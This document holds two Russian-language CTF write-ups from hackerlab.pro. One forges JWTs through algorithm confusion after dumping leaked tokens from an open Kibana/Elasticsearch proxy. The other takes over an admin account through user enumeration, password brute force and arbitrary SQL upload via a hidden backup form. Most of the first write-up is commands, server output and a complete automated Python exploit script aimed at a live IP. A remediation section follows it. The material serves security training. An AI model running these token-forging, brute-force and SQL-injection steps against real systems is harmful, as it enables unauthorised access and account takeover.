=============================================================
ОТЧЁТ ПО РЕШЕНИЮ ЗАДАЧИ "Хьюстон, у нас течь" — Hackerlab.pro
=============================================================

Уровень: Сложный
Категория: Web / Auth Bypass / JWT Algorithm Confusion
Цель: http://62.173.140.174:16108/ (vhost: cybercorp.ctf)
Флаг: CODEBY{Alg0r17hm_M15m47ch}

=============================================================
0. УСЛОВИЕ
=============================================================

Текст условия:

Вы наткнулись на сайт компании "CyberCorp" — разработчика софта
для кибербезопасности. Пройдите авторизацию и заберите флаг.
IP: 62.173.140.174:16108

Название задачи "Хьюстон, у нас течь" — намёк на утечку данных
(leak) где-то в инфраструктуре компании. Подпись флага
"M15m47ch" — намёк на mismatch (несоответствие), т.е. на
несоответствие алгоритма JWT.

Создаём рабочую директорию:

mkdir -p /home/fnay/Pentest/cursor/task/hackerlab.pro/Houston_techa
cd /home/fnay/Pentest/cursor/task/hackerlab.pro/Houston_techa

==============================================================
ШАГ 1. ПЕРВИЧНАЯ РАЗВЕДКА — ОПРЕДЕЛЯЕМ VHOST
==============================================================

Команда:

curl -s -i http://62.173.140.174:16108/ --max-time 10

Полный ответ:

HTTP/1.1 301 Moved Permanently
Server: nginx/1.29.4
Date: Mon, 18 May 2026 10:04:07 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: http://cybercorp.ctf/

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.29.4</center>
</body>
</html>

Рассуждение. Default vhost у nginx редиректит на cybercorp.ctf —
значит, на сервере виртуальные хосты. Дальше всё ходим с
заголовком Host: cybercorp.ctf.

Команда:

curl -s -i -H "Host: cybercorp.ctf" http://62.173.140.174:16108/ --max-time 10

Ответ — главная HTML-страница компании CyberCorp с тремя
карточками сотрудников и ссылкой /login:

HTTP/1.1 200 OK
Server: nginx/1.29.4
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="ru">
...
<h1 class="display-4">CyberCorp</h1>
...
<h5 class="card-title">Mikhail Stepanov</h5> <p>Guest Blogger</p>
<h5 class="card-title">Ekaterina Ivanova</h5> <p>Junior Developer</p>
<h5 class="card-title">Aleksandr Morozov</h5> <p>SysAdmin</p>
...
<a href="/login" class="btn btn-primary btn-lg">Войти в систему</a>

Запоминаем имена сотрудников — пригодятся для подбора имён
пользователей.

==============================================================
ШАГ 2. КАРТА ЭНДПОИНТОВ И ПЕРВЫЙ ЗАШИЩЁННЫЙ МАРШРУТ
==============================================================

Команда (быстрый перебор популярных путей):

for ep in /robots.txt /sitemap.xml /admin /api /.git/config /.env \
/backup /flag /static/ /uploads/ /blog /posts /users \
/api/users /register /signup /search; do
r=$(curl -s -o /dev/null -w "%{http_code}|%{size_download}" \
-H "Host: cybercorp.ctf" "http://62.173.140.174:16108$ep" --max-time 5)
echo "$ep -> $r"
done

Все ответы 404. Тогда gobuster:

gobuster dir -u http://62.173.140.174:16108/ -H "Host: cybercorp.ctf" \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-q -t 30 --timeout 5s

Полный вывод:

/about (Status: 200) [Size: 937]
/login (Status: 200) [Size: 947]
/profile (Status: 403) [Size: 17]

Дальше — содержимое каждого:

curl -s -H "Host: cybercorp.ctf" http://62.173.140.174:16108/about

Полный ответ:

<h1 class="mt-5">Наши сотрудники</h1>
<p>Недавно наша команда обсуждала новую систему авторизации.
Подробности можно найти во внутренних логах.</p>
<ul class="list-group">
<li class="list-group-item">Mikhail Stepanov - Guest Blogger</li>
<li class="list-group-item">Ekaterina Ivanova - Junior Developer</li>
<li class="list-group-item">Aleksandr Morozov - SysAdmin</li>
</ul>

Важный текст: "Подробности можно найти во внутренних логах".
Это прямой намёк: ищем сервис логирования (Kibana / Graylog /
Loki / etc.).

curl -s -i -H "Host: cybercorp.ctf" http://62.173.140.174:16108/profile

HTTP/1.1 403 FORBIDDEN
Content-Length: 17

No token provided

Профиль требует токен. По каналам пробуем варианты передачи:

curl -s -i -H "Host: cybercorp.ctf" -H "Cookie: token=xxx" \
http://62.173.140.174:16108/profile

HTTP/1.1 500 INTERNAL SERVER ERROR
Server error: Not enough segments

Сообщение "Not enough segments" — типичная ошибка библиотеки
PyJWT, когда строка не делится на три части по точке. Значит:

- Токен передаётся в Cookie token=...
- Это JWT.

==============================================================
ШАГ 3. ОПРЕДЕЛЕНИЕ ТИПА ПРОВЕРКИ JWT
==============================================================

Проверка alg=none:

H=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 -w0 | tr '+/' '-_' | tr -d '=')
P=$(echo -n '{"sub":"admin","role":"admin"}' | base64 -w0 | tr '+/' '-_' | tr -d '=')
TOK="$H.$P."
curl -s -i -H "Host: cybercorp.ctf" -H "Cookie: token=$TOK" \
http://62.173.140.174:16108/profile

HTTP/1.1 403 FORBIDDEN
Unsupported algorithm

alg=none не принимают. Тогда HS256 с произвольной подписью:

TOK="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.invalidsig"
curl -s -i -H "Host: cybercorp.ctf" -H "Cookie: token=$TOK" \
http://62.173.140.174:16108/profile

HTTP/1.1 403 FORBIDDEN
Invalid token signature

HS256 поддерживается, но нужна валидная подпись. Нужен секрет
или валидный токен.

==============================================================
ШАГ 4. УТЕЧКА — ИЩЕМ "ВНУТРЕННИЕ ЛОГИ"
==============================================================

Текст из /about прямо говорит про внутренние логи. На сабдомене
основного хоста, очевидно, что-то крутится. Перебираем поддомены
по словарю.

Команда:

gobuster vhost -u http://62.173.140.174:16108/ \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
--append-domain --domain cybercorp.ctf -q -t 30 --timeout 5s

Полный вывод:

Found: logs.cybercorp.ctf Status: 302 [Size: 0] [--> /spaces/enter]

Найден сабдомен logs.cybercorp.ctf. Идём туда:

curl -s -i -H "Host: logs.cybercorp.ctf" http://62.173.140.174:16108/

Полный ответ:

HTTP/1.1 302 Found
location: /spaces/enter
x-content-type-options: nosniff
kbn-name: 370c97d0129f
kbn-license-sig: d02f99f3aabeaa1c4ed51369f5f839a1ff5bd8ea9bba6befc839381842c6d158
cache-control: private, no-cache, no-store, must-revalidate

Заголовки kbn-name и kbn-license-sig — однозначная подпись
Kibana. Уточняем версию:

curl -s -H "Host: logs.cybercorp.ctf" \
http://62.173.140.174:16108/api/status | python3 -m json.tool | head

{
"name": "370c97d0129f",
"uuid": "289c061d-5f66-4e3e-a4c1-2442e237a61a",
"version": {
"number": "7.17.0",
...
},
"status": { "overall": { "state": "green" } }
...

Kibana 7.17.0 без авторизации — это и есть утечка. Через Kibana
есть прямой проксированный доступ к Elasticsearch:
/api/console/proxy.

==============================================================
ШАГ 5. СПИСОК ИНДЕКСОВ ELASTICSEARCH
==============================================================

Команда (Kibana требует заголовок kbn-xsrf):

curl -s -H "Host: logs.cybercorp.ctf" -H "kbn-xsrf: true" \
-X POST "http://62.173.140.174:16108/api/console/proxy?path=_cat/indices&method=GET"

Полный ответ:

green open .geoip_databases ... 43 42 40.1mb 40.1mb
green open .reporting-2026-02-15 ... 2 1 476.7kb 476.7kb
green open .kibana_7.17.0_001 ... 1355 148 4.8mb 4.8mb
green open .apm-custom-link ... 0 0 226b 226b
yellow open testcfg ... 0 0 226b 226b
green open .apm-agent-configuration ... 0 0 226b 226b
yellow open cybercorp-logs ... 3000 0 529.5kb 529.5kb
yellow open testjvm ... 0 0 226b 226b
yellow open index ... 1 0 3.6kb 3.6kb
green open .async-search ... 0 0 260b 260b
green open .reporting-2026-04-12 ... 1 0 286kb 286kb
green open .kibana_task_manager_7.17.0_001 ... 17 227590 44.3mb 44.3mb

Прицеливаемся в cybercorp-logs (3000 документов).

==============================================================
ШАГ 6. ДАМП ЛОГОВ И НАЙДЕННЫЕ ТОКЕНЫ
==============================================================

Команда:

curl -s -H "Host: logs.cybercorp.ctf" -H "kbn-xsrf: true" \
-X POST "http://62.173.140.174:16108/api/console/proxy?path=cybercorp-logs/_search?size=5&method=GET" \
| python3 -m json.tool

Полный фрагмент (первый документ показателен):

{
"took": 1,
"hits": {
"total": {"value": 3000, "relation": "eq"},
"hits": [
{
"_index": "cybercorp-logs",
"_id": "0",
"_source": {
"timestamp": "2024-03-09T17:42:23",
"message": "Database connection pool increased to 50.",
"user": "dmitry.sokolov",
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZG1pdHJ5LnNva29sb3YiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE3MzI1MzYxNTZ9.uAYwHKNlvW0oxajh2aMfwQL-ZcAvCHOJ_FvVw2YBjv8"
}
},
...
]
}
}

В логах ЛЕЖАТ JWT-токены пользователей — прямая утечка.
Декодируем для понимания структуры:

echo "eyJ1c2VyIjoiZG1pdHJ5LnNva29sb3YiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE3MzI1MzYxNTZ9" | base64 -d
{"user":"dmitry.sokolov","role":"employee","exp":1732536156}

Структура payload-а: user, role, exp. Все токены HS256.

Собираем все токены и смотрим уникальные роли:

curl -s -H "Host: logs.cybercorp.ctf" -H "kbn-xsrf: true" \
-H "Content-Type: application/json" \
-X POST "http://62.173.140.174:16108/api/console/proxy?path=cybercorp-logs/_search&method=POST" \
-d '{"size":3000,"query":{"exists":{"field":"token"}},"_source":["token","user"]}' \
> /tmp/all_tokens.json

Парсим payload, считаем роли:

Total hits with token: 1491

=== ROLE: employee (874) ===
pavel.nikolaev, anna.kuznetsova, natalia.morozova, aleksandr.morozov,
dmitry.sokolov, sergey.ivanov, ...

=== ROLE: user (298) ===
olga.smirnova, ekaterina.ivanova, ...

=== ROLE: guest (319) ===
mikhail.stepanov, ivan.petrov, ...

Только 3 роли: employee, user, guest. Все exp в прошлом.

==============================================================
ШАГ 7. ПРОВЕРКА — ОДНА ЛИ СУПИСЬ И КАК ВАЛИДИРУЕТСЯ
==============================================================

Шлём один из реальных протухших токенов:

TOK="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZG1pdHJ5LnNva29sb3YiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE3MzI1MzYxNTZ9.uAYwHKNlvW0oxajh2aMfwQL-ZcAvCHOJ_FvVw2YBjv8"
curl -s -i -H "Host: cybercorp.ctf" -H "Cookie: token=$TOK" \
http://62.173.140.174:16108/profile

HTTP/1.1 403 FORBIDDEN
Token expired

"Token expired" вместо "Invalid token signature" значит, что
ПОДПИСЬ ВАЛИДНА (общий секрет одинаков для всех токенов в
логах), просто exp в прошлом. Если узнаем секрет — выпустим
свежий токен.

==============================================================
ШАГ 8. КРЕК СЕКРЕТА — ПЕРВАЯ ПОПЫТКА (RockYou)
==============================================================

Команда:

echo "$TOK" > jwt_hash.txt
hashcat -m 16500 jwt_hash.txt /usr/share/wordlists/rockyou.txt -O

Результат:

Status...........: Exhausted
Hash.Mode........: 16500 (JWT (JSON Web Token))
Speed.#1.........: 2104.6 kH/s
Recovered........: 0/1 (0.00%)
Progress.........: 14344385/14344385 (100.00%)

Секрет не словарный. Нужен другой путь.

==============================================================
ШАГ 9. ПОИСК ПО ЛОГАМ КЛЮЧЕВЫХ СЛОВ
==============================================================

Команда:

for term in secret key password JWT_SECRET token_secret config; do
echo "=== $term ==="
curl -s -H "Host: logs.cybercorp.ctf" -H "kbn-xsrf: true" \
-H "Content-Type: application/json" \
-X POST "http://62.173.140.174:16108/api/console/proxy?path=cybercorp-logs/_search&method=POST" \
-d "{\"size\":5,\"query\":{\"query_string\":{\"query\":\"$term\"}}}" \
| python3 -m json.tool
done

Полезный результат пришёл по запросу "key":

{
"hits": {
"total": {"value": 1, "relation": "eq"},
"hits": [{
"_id": "2641",
"_source": {
"timestamp": "2024-06-22T00:51:05",
"message": "Public key at /keys/public.pem"
}
}]
}
}

В логе упомянут путь /keys/public.pem.

==============================================================
ШАГ 10. ЗАБИРАЕМ ПУБЛИЧНЫЙ КЛЮЧ
==============================================================

Команда:

curl -s -H "Host: cybercorp.ctf" \
http://62.173.140.174:16108/keys/public.pem -o public.pem
cat public.pem

Полный вывод:

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsWf893QPffBxTpySt2KW
sDTmD2Ftb4kwXxTbFSCnBZSWfasNqkxt2+bIJvlMFcjm2Ee7PNMoPv4d+/h81nLv
lfOQIOE7kbfoqvLx0jtbQU2Sa1cUP57BjP96jgiJWtj6U3LecbwFqyT/WlpSTA22
6Mad2s3SdoWeDjGR6XT4LxlYIJ2a/gHv30nY73V7WJ0NEIBFromw4hk7ub98gsVg
8zYQfEz04yIN5g8jbu6fG/EZmgENYdc05jQ26kkABweK3UmvzCIgZpwkb6x5Qz7b
n+ML8/Q/7H57O/KG7Os4h5M0hbQBYOvz7l8Ln8mMwjPcetD5+DoT58DR/ywzZZAJ
nwIDAQAB
-----END PUBLIC KEY-----

Здесь и сходится загадка названия "M15m47ch": алгоритмический
мисматч. Классическая уязвимость JWT-библиотек: если сервер
изначально проверяет RS256, но принимает HS256 — он использует
PEM публичного ключа как HMAC-секрет. Атакующий уже знает
публичный ключ (он публичен), значит может подписать свой HS256
токен.

==============================================================
ШАГ 11. ПОДДЕЛКА ТОКЕНА — HS256 С PUBLIC.PEM КАК СЕКРЕТОМ
==============================================================

Питон-однострочник, перебирающий формы PEM (с/без \n) как
секрета:

python3 << 'EOF'
import hmac, hashlib, base64, json, time

def b64url(b): return base64.urlsafe_b64encode(b).rstrip(b'=').decode()
with open('public.pem','rb') as f: pub = f.read()

for name, secret in [
('raw', pub),
('stripped', pub.strip()),
('strip+nl', pub.strip()+b'\n'),
]:
h_b = b64url(json.dumps({"alg":"HS256","typ":"JWT"},separators=(',',':')).encode())
p_b = b64url(json.dumps({"user":"admin","role":"admin",
"exp":int(time.time())+3600},separators=(',',':')).encode())
sig = b64url(hmac.new(secret, f"{h_b}.{p_b}".encode(), hashlib.sha256).digest())
print(name, len(secret), f"{h_b}.{p_b}.{sig}")
EOF

Шлём оба варианта; нас интересует именно ТО, что вернёт "Access
denied" вместо "Invalid token signature" — это и есть верная
форма ключа.

Первый запрос (PEM с финальным \n):

curl -s -i -H "Host: cybercorp.ctf" \
-H "Cookie: token=<raw_pem_jwt>" \
http://62.173.140.174:16108/profile

HTTP/1.1 403 FORBIDDEN
Access denied

Второй запрос (PEM без \n):

HTTP/1.1 403 FORBIDDEN
Invalid token signature

Победила форма "PEM как файл, с финальным переводом строки".
Подпись валидна — осталось подобрать user+role, которому реально
разрешён /profile.

==============================================================
ШАГ 12. ПОДБОР USER + ROLE
==============================================================

Из логов известны 3 роли и 10+ имён. Перебираем реальные
сочетания (валидная роль + реальное имя):

real = [
("dmitry.sokolov", "employee"),
("aleksandr.morozov", "employee"),
("mikhail.stepanov", "guest"),
("olga.smirnova", "user"),
("ekaterina.ivanova", "user"),
]

Полный вывод (Python-скрипт пробивает /profile с каждым):

u=dmitry.sokolov r=employee -> 403 Access denied
u=aleksandr.morozov r=employee -> 200 OK
u=mikhail.stepanov r=guest -> 403 Access denied
u=olga.smirnova r=user -> 403 Access denied
u=ekaterina.ivanova r=user -> 403 Access denied

Прошёл только Aleksandr Morozov — тот самый SysAdmin со
страницы /about.

==============================================================
ШАГ 13. ПОЛУЧЕНИЕ ФЛАГА
==============================================================

Команда:

python3 << 'EOF'
import hmac, hashlib, base64, json, time, urllib.request

def b64url(b): return base64.urlsafe_b64encode(b).rstrip(b'=').decode()
with open('public.pem','rb') as f: pub = f.read()
secret = pub if pub.endswith(b'\n') else pub + b'\n'

payload = {"user":"aleksandr.morozov","role":"employee",
"exp": int(time.time())+3600}
h_b = b64url(json.dumps({"alg":"HS256","typ":"JWT"},separators=(',',':')).encode())
p_b = b64url(json.dumps(payload,separators=(',',':')).encode())
sig = b64url(hmac.new(secret, f"{h_b}.{p_b}".encode(), hashlib.sha256).digest())
tok = f"{h_b}.{p_b}.{sig}"
print("TOK:", tok)

req = urllib.request.Request("http://62.173.140.174:16108/profile",
headers={"Host":"cybercorp.ctf","Cookie":f"token={tok}"})
with urllib.request.urlopen(req, timeout=5) as r:
print(r.read().decode())
EOF

Полный ответ:

TOK: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWxla3NhbmRyLm1vcm96b3YiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE3NzkxMDMxMDJ9._j48Aoe0mCs1tIXKYluV7uuGU15Lv0HtV-pPKiWKWHc

<!DOCTYPE html>
<html>
<head>
<title>Профиль - CyberCorp</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">
<h1 class="mt-5">Профиль сотрудника</h1>
<p>Добро пожаловать, сотрудник CyberCorp!</p>
<div class="alert alert-success">Флаг: CODEBY{Alg0r17hm_M15m47ch}</div>
<a href="/" class="btn btn-primary mt-3">Назад</a>
</div>
</body>
</html>

ФЛАГ:

CODEBY{Alg0r17hm_M15m47ch}

==============================================================
ПОЧЕМУ СЕРВИС УЯЗВИМ
==============================================================

1. Kibana 7.17.0 (logs.cybercorp.ctf) выставлена в интернет без
аутентификации. Любой обладатель URL получает прямой доступ
к индексам Elasticsearch через /api/console/proxy.

2. В индекс cybercorp-logs пишутся JWT-токены пользователей
как обычные поля документов — прямая утечка PII/секретов.

3. Бэкенд аутентификации страдает классической Algorithm
Confusion: для HS256 в качестве секрета используется
содержимое PEM-файла, который сам по себе публичен (это же
public.pem). Любой, кто его скачает, может подделать любые
HS256-токены.

4. Файл /keys/public.pem отдаётся nginx-ом наружу без всяких
ограничений.

==============================================================
КАК ИСПРАВИТЬ
==============================================================

- Закрыть Kibana basic-auth-ом или kibana.yml с настроенной
ролью в xpack.security; ограничить доступ по IP.
- Не писать JWT в логи. Маскировать поля token/password/secret
в логгере.
- При проверке RS256-токенов жёстко фиксировать алгоритм:
jwt.decode(token, pub, algorithms=["RS256"])
Никогда не позволять библиотеке выбрать алгоритм по полю
header.alg.
- /keys/public.pem либо не отдавать клиенту вообще, либо
раскрыть только содержимое (а не path как hint).

==============================================================
ИТОГО
==============================================================

Цепочка: vhost-enum → открытая Kibana → утечка JWT в логах
→ лог с путём к public.pem → HS256 forge на pub.pem
→ подбор user+role → /profile отдаёт флаг.

ФЛАГ: CODEBY{Alg0r17hm_M15m47ch}
---

Poc

и

#!/usr/bin/env python3
"""
PoC: JWT Algorithm Confusion + Kibana data leak
Задача: "Хьюстон, у нас течь" (hackerlab.pro)

Цепочка эксплуатации:
1. Поиск vhost-ов на одном IP -> logs.cybercorp.ctf (Kibana 7.17 без auth).
2. Через /api/console/proxy дёргаем Elasticsearch напрямую и
вычитываем индекс cybercorp-logs со слитыми JWT.
3. Один из логов указывает путь /keys/public.pem.
4. PEM с публичным RSA-ключом отдаётся нашему vhost-у cybercorp.ctf.
5. Подделываем HS256-токен, используя содержимое public.pem
как HMAC-секрет (классический JWT algorithm confusion).
6. Перебираем пары user+role на /profile до 200 OK.
7. Достаём флаг со страницы.

Использование:
python3 poc.py # дефолтный таргет
python3 poc.py http://IP:PORT
"""

import sys
import re
import json
import time
import hmac
import hashlib
import base64
import urllib.request
import urllib.error

DEFAULT_TARGET = "http://62.173.140.174:16108"
APP_VHOST = "cybercorp.ctf"
LOGS_VHOST = "logs.cybercorp.ctf"
PUBKEY_PATH = "/keys/public.pem"
LOGS_INDEX = "cybercorp-logs"
PROFILE_PATH = "/profile"

# ---------- хакерский вывод (только зелёный/белый) ----------

class C:
G = "\033[38;5;46m"
W = "\033[97m"
BOLD = "\033[1m"
END = "\033[0m"

BANNER = r"""
___ __ __ __ ___ __ __
|__ |__) / \ / ` |__| /\ |__/ |__ |__) | /\ |__)
| ___ | \__/ \__, ___ | | /~~\ | \ |___ | \ |___ /~~\ |__)
"""

def banner(text):
print()
print(f"{C.BOLD}{C.G}{'=' * 70}{C.END}")
print(f"{C.BOLD}{C.G}{text}{C.END}")
print(f"{C.BOLD}{C.G}{'=' * 70}{C.END}")

def step(num, title):
print()
print(f"{C.BOLD}{C.G}[ШАГ {num}]{C.END} {C.BOLD}{C.W}{title}{C.END}")
print(f"{C.G}{'-' * 70}{C.END}")

def info(label, value):
print(f" {C.G}{label}:{C.END} {C.W}{value}{C.END}")

def good(text): print(f" {C.BOLD}{C.G}[+]{C.END} {C.W}{text}{C.END}")
def bad(text): print(f" {C.BOLD}{C.G}[-]{C.END} {C.W}{text}{C.END}")
def note(text): print(f" {C.G}[*]{C.END} {C.W}{text}{C.END}")

# ---------- HTTP ----------

def http(method, target, path, host, headers=None, body=None, timeout=15):
req_headers = {"Host": host}
if headers:
req_headers.update(headers)
if body is not None and isinstance(body, (dict, list)):
body = json.dumps(body).encode()
req_headers.setdefault("Content-Type", "application/json")
elif isinstance(body, str):
body = body.encode()

req = urllib.request.Request(
target + path,
data=body,
headers=req_headers,
method=method,
)
try:
with urllib.request.urlopen(req, timeout=timeout) as r:
return r.getcode(), r.read().decode(errors="replace"), dict(r.headers)
except urllib.error.HTTPError as e:
return e.code, e.read().decode(errors="replace"), dict(e.headers)
except urllib.error.URLError as e:
bad(f"сеть недоступна: {e}")
sys.exit(1)

# ---------- JWT ----------

def b64url(b):
return base64.urlsafe_b64encode(b).rstrip(b'=').decode()

def jwt_hs256(payload, secret):
h_b = b64url(json.dumps({"alg":"HS256","typ":"JWT"}, separators=(',',':')).encode())
p_b = b64url(json.dumps(payload, separators=(',',':')).encode())
sig = b64url(hmac.new(secret, f"{h_b}.{p_b}".encode(), hashlib.sha256).digest())
return f"{h_b}.{p_b}.{sig}"

# ---------- шаги ----------

def step1_check_kibana(target):
step(1, "Проверка открытой Kibana на logs.cybercorp.ctf")
code, body, headers = http("GET", target, "/api/status", LOGS_VHOST)
info("Status", code)

if "kbn-name" in {k.lower() for k in headers}:
good("Kibana обнаружена (по заголовкам kbn-*)")
try:
j = json.loads(body)
info("Kibana version", j["version"]["number"])
info("Overall state", j["status"]["overall"]["state"])
except Exception:
bad("не удалось разобрать JSON статуса")
sys.exit(1)

def step2_list_indices(target):
step(2, "Чтение индексов Elasticsearch через /api/console/proxy")
code, body, _ = http(
"POST", target,
"/api/console/proxy?path=_cat/indices&method=GET",
LOGS_VHOST,
headers={"kbn-xsrf": "true"},
)
info("Status", code)
for line in body.strip().splitlines():
if LOGS_INDEX in line:
print(f" {C.BOLD}{C.G}>>>{C.END} {C.W}{line}{C.END}")
good(f"индекс {LOGS_INDEX} найден")
return
bad(f"индекс {LOGS_INDEX} не найден")
sys.exit(1)

def step3_leak_sample_token(target):
step(3, "Утечка JWT из логов cybercorp-logs")
query = {"size": 10, "query": {"exists": {"field": "token"}}, "_source": ["user", "token"]}
code, body, _ = http(
"POST", target,
f"/api/console/proxy?path={LOGS_INDEX}/_search&method=POST",
LOGS_VHOST,
headers={"kbn-xsrf": "true"},
body=query,
)
info("Status", code)
j = json.loads(body)
hits = j.get("hits", {}).get("hits", [])
info("Найдено документов с token", j["hits"]["total"]["value"])
if not hits:
bad("в логах нет токенов")
sys.exit(1)
sample = hits[0]["_source"]
info("Sample user", sample.get("user"))
info("Sample token", sample.get("token")[:60] + "...")
return sample.get("token")

def step4_check_signature_reuse(target, leaked_token):
step(4, "Проверка валидности подписи (что секрет общий)")
code, body, _ = http(
"GET", target, PROFILE_PATH, APP_VHOST,
headers={"Cookie": f"token={leaked_token}"},
)
info("Status", code)
info("Body", body[:80])
if "expired" in body.lower():
good("подпись валидна (Token expired) — секрет общий для всех токенов")
elif "invalid" in body.lower():
bad("подпись не подходит — посмотрите вариант секрета")
sys.exit(1)

def step5_find_pubkey_hint(target):
step(5, "Поиск пути к публичному ключу в логах")
query = {"size": 5, "query": {"query_string": {"query": "key"}}}
code, body, _ = http(
"POST", target,
f"/api/console/proxy?path={LOGS_INDEX}/_search&method=POST",
LOGS_VHOST,
headers={"kbn-xsrf": "true"},
body=query,
)
j = json.loads(body)
for h in j["hits"]["hits"]:
msg = h["_source"].get("message", "")
m = re.search(r"(/\S+\.pem)", msg)
if m:
info("Лог-запись", msg)
good(f"путь к ключу: {m.group(1)}")
return m.group(1)
bad("в логах нет упоминания .pem")
sys.exit(1)

def step6_fetch_pubkey(target, path):
step(6, "Загрузка публичного ключа")
code, body, _ = http("GET", target, path, APP_VHOST)
info("Status", code)
if "BEGIN PUBLIC KEY" not in body:
bad("по этому пути нет PEM")
sys.exit(1)
good("public.pem получен:")
for line in body.strip().splitlines():
print(f" {C.W}{line}{C.END}")
return body

def step7_forge_token(target, pubkey_pem):
step(7, "Подделка HS256-токена (PEM как HMAC-секрет)")
note("Алгоритм-confusion: сервер ждёт RS256, но принимает HS256, "
"используя содержимое public.pem как симметричный секрет.")

pub_bytes = pubkey_pem.encode()
variants = {
"raw": pub_bytes,
"strip": pub_bytes.strip(),
"strip+\\n": pub_bytes.strip() + b"\n",
}

real_pairs = [
("dmitry.sokolov", "employee"),
("aleksandr.morozov", "employee"),
("mikhail.stepanov", "guest"),
("olga.smirnova", "user"),
("ekaterina.ivanova", "user"),
]

for variant_name, secret in variants.items():
info("Пробуем форму секрета", f"{variant_name} ({len(secret)} байт)")
for user, role in real_pairs:
tok = jwt_hs256(
{"user": user, "role": role, "exp": int(time.time()) + 3600},
secret,
)
code, body, _ = http(
"GET", target, PROFILE_PATH, APP_VHOST,
headers={"Cookie": f"token={tok}"},
)
short = body.strip().replace("\n", " ")[:60]
print(f" {C.G}u={user:22} r={role:10}{C.END} "
f"{C.W}-> {code} | {short}{C.END}")
if code == 200:
good(f"взяли /profile с user={user}, role={role}")
return tok, body

bad("ни одна пара user/role не дала 200")
sys.exit(1)

def step8_extract_flag(html):
step(8, "Извлечение флага из ответа")
m = re.search(r"(CODEBY\{[^}]+\}|[A-Za-z0-9_]+\{[^}]+\})", html)
if m:
good(f"нашли: {m.group(1)}")
return m.group(1)
note("явного флага не нашлось, печатаю полный body:")
print(html)
return None

# ---------- main ----------

def main():
target = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else DEFAULT_TARGET

print(f"{C.BOLD}{C.G}{BANNER}{C.END}")
banner(f"PoC: Хьюстон, у нас течь ({target})")
info("Target", target)
info("App vhost", APP_VHOST)
info("Logs vhost", LOGS_VHOST)

step1_check_kibana(target)
step2_list_indices(target)
leaked = step3_leak_sample_token(target)
step4_check_signature_reuse(target, leaked)
pubkey_path = step5_find_pubkey_hint(target)
pem = step6_fetch_pubkey(target, pubkey_path)
_, body = step7_forge_token(target, pem)
flag = step8_extract_flag(body)

banner("РЕЗУЛЬТАТ")
if flag:
print(f" {C.BOLD}{C.G}FLAG:{C.END} {C.BOLD}{C.W}{flag}{C.END}")
print()

if __name__ == "__main__":
main()

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

CTF Write-up | «Хаос на АЗС» — hackerlab.pro

Заправка. Flask. Werkzeug. Выглядит скучно — внутри полный хаос.

Цель: 62.173.140.174:16109 Флаг: CODEBY{FU3L_B4CKUP_0WN3D}

[1/5] Захожу на территорию

nmap — живёт HTTP на Werkzeug 3.1.5, Python 3.11.6. Титул страницы: «AZS LEET». Окей, посмотрим что тут за лит-заправка.

Перебираю маршруты — /admin, /admin/fuel, /admin/backup, /admin/secret — всё редиректит на /adminLogin. Единственная открытая дверь. Стучимся.

[2/5] Приложение само сдаёт своих пользователей

Пробую случайный логин — User does not exist. Пробую operator — Check username or password.

Стоп. Это разные сообщения. Приложение буквально говорит мне кто существует, а кто нет.

ffuf + SecLists, фильтрую по User does not exist — остаётся только то, что нашлось:

operator   → секция Fuel
superadmin → секция Secret

Два юзера. Меньше минуты.

[3/5] 42-я попытка

Берём darkweb2017_top-100.txt — самые позорные пароли планеты Земля. Запускаю ffuf на operator.

На 42-й итерации — HTTP 302. Редирект на /admin/fuel.

Пароль: qwe123. Серьёзно.

Куки в кармане. Захожу в панель управления.

[4/5] А вот это интересно

Смотрю исходник /admin/fuel. Форма с ценами — скучно. Но ниже:

html

<form method="post" action="/admin/backup"
      enctype="multipart/form-data" hidden>
  <input type="file" name="sqlfile">
</form>

hidden. В браузере не видно. Для обычного юзера — не существует. Для curl — прекрасно видна.

GET /admin/backup — сервер любезно отдаёт полный SQL-дамп. С таблицей users. С хешами паролей. Всех.

sql

INSERT INTO "users" VALUES('Secret','superadmin','d9e9fece...');

Что за хеш? Знаю пару qwe123 → b6a2976b... — проверяю схемы. SHA256 — мимо. MD5 — мимо. SHA256(SHA256(pass)) — попадание. Без соли. Классика.

Генерирую хеш для нового пароля pass123, создаю файлик:

sql

UPDATE users SET password='826ec584...'
WHERE username='superadmin';

Загружаю через скрытую форму:

bash

curl -b /tmp/cookies.txt \
  -F "sqlfile=@inject.sql" \
  http://62.173.140.174:16109/admin/backup

Сервер принимает. Выполняет. И — вишенка на торте — возвращает обновлённый дамп, где хеш superadmin уже мой.

[5/5] Заезжаю на секретную заправку

section=Secret&username=superadmin&password=pass123

HTTP 302 → /admin/secret → открываю страницу →

CODEBY{FU3L_B4CKUP_0WN3D}

Заправка наша.

Цепочка целиком: nmap → User Enum → брутфорс → скрытая форма → SQL-дамп с хешами → inject.sql → смена пароля superadmin → флаг

Ни одной экзотической техники. Только невнимательность разработчика — и четыре дыры выстроились в прямую дорожку к флагу.

Уязвимости: User Enumeration / Weak Password / SQL Dump Exposure / Arbitrary SQL Execution / Unsalted Double SHA-256

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
